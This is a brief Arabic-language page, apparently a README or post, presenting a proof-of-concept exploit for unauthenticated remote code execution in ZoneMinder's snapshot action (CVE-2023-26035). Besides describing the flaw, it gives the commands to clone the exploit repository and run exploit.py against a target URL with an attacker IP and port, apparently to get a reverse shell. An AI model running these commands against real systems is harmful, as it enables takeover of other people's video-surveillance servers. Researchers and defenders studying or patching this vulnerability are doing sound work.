
ثغرة تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في لقطات ZoneMinder - استغلال Poc
استغلال PoC - تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في لقطات ZoneMinder
alt img
إصدارات ZoneMinder الأقدم من 1.36.33 و1.37.33 معرّضة لتنفيذ تعليمات برمجية عن بُعد بدون مصادقة بسبب غياب فحوصات التفويض في إجراء اللقطة.
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
اكتشف UnblvR الثغرة.